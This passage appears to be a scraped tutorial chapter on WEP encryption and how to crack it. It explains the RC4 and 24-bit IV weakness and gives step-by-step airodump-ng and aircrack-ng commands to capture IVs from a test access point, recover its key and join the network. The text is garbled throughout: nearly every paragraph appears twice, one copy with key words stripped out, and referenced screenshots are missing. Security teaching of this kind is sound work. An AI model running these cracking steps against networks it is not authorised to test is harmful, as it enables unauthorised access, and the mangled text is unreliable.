WEP theory





Wired Equivalent Privacy (WEP) encryption, because it's the oldest one, and also the easiest one to break. WEP encryption uses an algorithm called RC4; each packet is encrypted at the Access Point (AP), and then sent out into the air. Once the client receives it, the client will be able to decrypt the packet and read the information inside of it, since the client has the key. In short, the AP encrypts the packet and sends it, and the client receives and decrypts it. In the same way, when the client itself sends the packet, the client encrypts it and then sends it out, and the AP receives and decrypts it with a key. The first encryption that we will discuss is) encryption, because it's the oldest one, and also the easiest one to break. WEP encryption uses an algorithm called RC4; each packet is encrypted at the), and then sent out into the air. Once the client receives it, the client will be able to decrypt the packet and read the information inside of it, since the client has the key. In short, the APencrypts the packet and sends it, and the client receives and decrypts it. In the same way, when the client itself sends the packet, the client encrypts it and then sends it out, and the AP receives and decrypts it with a key.

Initialization Vector (IV). The IV is a random number that is sent into each packet in plain text, which is not encrypted. If we read the packet, we will be able to read a part of it in plain text. Each packet that is sent out has a unique key stream. WEP ensures that the key stream is unique by using a 24-bit). The IV is a random number that is sent into each packet in plain text, which is not encrypted. If we read the packet, we will be able to read a part of it in plain text.

aircrack-ng , which uses statistical attacks to determine key streams; it will be able to determine the WEP key. The problem with the IV is that it's very short (24-bits, which is not that long). In a busy network, there will be a very large number of packets sent, the possibilities of random IVs will be exhausted, and we will end up with two packets that have the same IV. If this happens, we can employ, which uses statistical attacks to determine key streams; it will be able to determine the WEP key.

— because when we have a large number of IVs, we will end up with two packets that use the same IV, and aircrack-ng will be likely to determine the key stream and the WEP key for the target network. In the next part of this chapter, we will see how this actually works, and it should be easier to understand. From the preceding information, we know that the more IVs we collect, the more likely we'll be to successfully crack the WEP key. Our main goal, when we try to crack WEP, is to collect as many IVs as we canbecause when we have a large number of IVs, we will end up with two packets that use the same IV, andwill be likely to determine the key stream and the WEP key for the target network. In the next part of this chapter, we will see how this actually works, and it should be easier to understand.

Basic web cracking





aircrack-ng will be able to use statistical attacks to determine the key stream and the WEP key for the target network. Obviously, when we have more than two packets, the method is going to work better, and our chances of breaking the key will be higher — we're going to try to gather as many IVs as possible. Through the previous section, we know that to crack a WEP key, all we have to do is sniff packets from the target network and gather as many IVs as possible. Once we have done that,will be able to use statistical attacks to determine the key stream and the WEP key for the target network. Obviously, when we have more than two packets, the method is going to work better, and our chances of breaking the key will be higherwe're going to try to gather as many IVs as possible.

airodump-ng wlan0 , very basic command, where wlan0 stands for the interface. Following will be displayed as a output: Let's look at the most basic case of cracking a WEP key. Wi-Fi card must be in monitor mode, and the first thing we're going to try to do is see all of the networks that are within our Wi-Fi range; then, we're going to target one of those networks. We're going to run, very basic command, wherestands for the interface. Following will be displayed as a output:





Test ; this is the network that we're going to perform our attacks on. We're going to launch airodump against Test network by using the following command: The first network that has come up is; this is the network that we're going to perform our attacks on. We're going to launchagainstnetwork by using the following command:

airodump-ng --bssid 54:B8:0A:9E:54:2D --channel 11 --write basic-test-ap wlan0

--bssid and launch an airodump against Test AP. We include the -channel , number 11 , and we add --write to store all of the packets that we capture into a file, which is basic-test-ap . As we run the preceding command, we will be able to see the output in the following screenshot, the target network that we have as the data we gathered it is quite a busy one, also the data and the frames are going: Here, we enter theand launch anagainstAP. We include the, number, and we addto store all of the packets that we capture into a file, which is. As we run the preceding command, we will be able to see the output in the following screenshot, the target network that we have as the data we gathered it is quite a busy one, also the data and the frames are going:









It is a busy network; the following is the section where we can see the clients:





aircrack-ng , which is part of the aircrack suite, against the file that airodump has created for us. We can launch aircrack against it even if we didn't stop airodump ; it will keep reading the file, and it will read the new packets that airodump is capturing. The command to use is as follows: aircrack-ng basic-test-ap-01.cap All we have to do now is launch, which is part of thesuite, against the file thathas created for us. We can launchagainst it even if we didn't stop; it will keep reading the file, and it will read the new packets thatis capturing. The command to use is as follows:

aircrack-ng , we will put in the filename basic-test-ap-01.cap . While the file is still being created, getting larger and larger with the inclusion of new packets, we can run aircrack-ng , and it will keep getting updated, eventually giving us the password we need for cracking. If aircrack fails to determine the key, aircrack waits until it reaches 5,000 IVs, and then tries again. When we use, we will put in the filename. While the file is still being created, getting larger and larger with the inclusion of new packets, we can run, and it will keep getting updated, eventually giving us the password we need for cracking. Iffails to determine the key,waits until it reaches 5,000 IVs, and then tries again.

The number of IVs actually depends on the type of WEP encryption. There are two types of

WEP encryption: 128-bit and 64-bit. The only difference is the length of the key; obviously,

aircrack , we indicated that the more packets we get without unique IVs, the higher our chances of cracking the WEP key are. 64-bit requires a lower number of IVs than 128-bit. Remember that when we discussed, we indicated that the more packets we get without unique IVs, the higher our chances of cracking the WEP key are.

aircrack can successfully crack the WEP key. Once it decrypts the key, we can press Ctrl + C. As we can see in the following screenshot, aircrack has successfully managed to get the key within data packets; this is because the target AP uses a 64-bit key: Now, we basically wait untilcan successfully crack the WEP key. Once it decrypts the key, we can press. As we can see in the following screenshot,has successfully managed to get the key within data packets; this is because the target AP uses a 64-bit key:









Let's look at how we can use this key to connect to the network. We are going to copy the key and use the key too connect. We can then connect to the target network:





As you can see, our connection has been established; we successfully recovered the WEP key from the target network. We can go ahead and confirm by pinging Google:



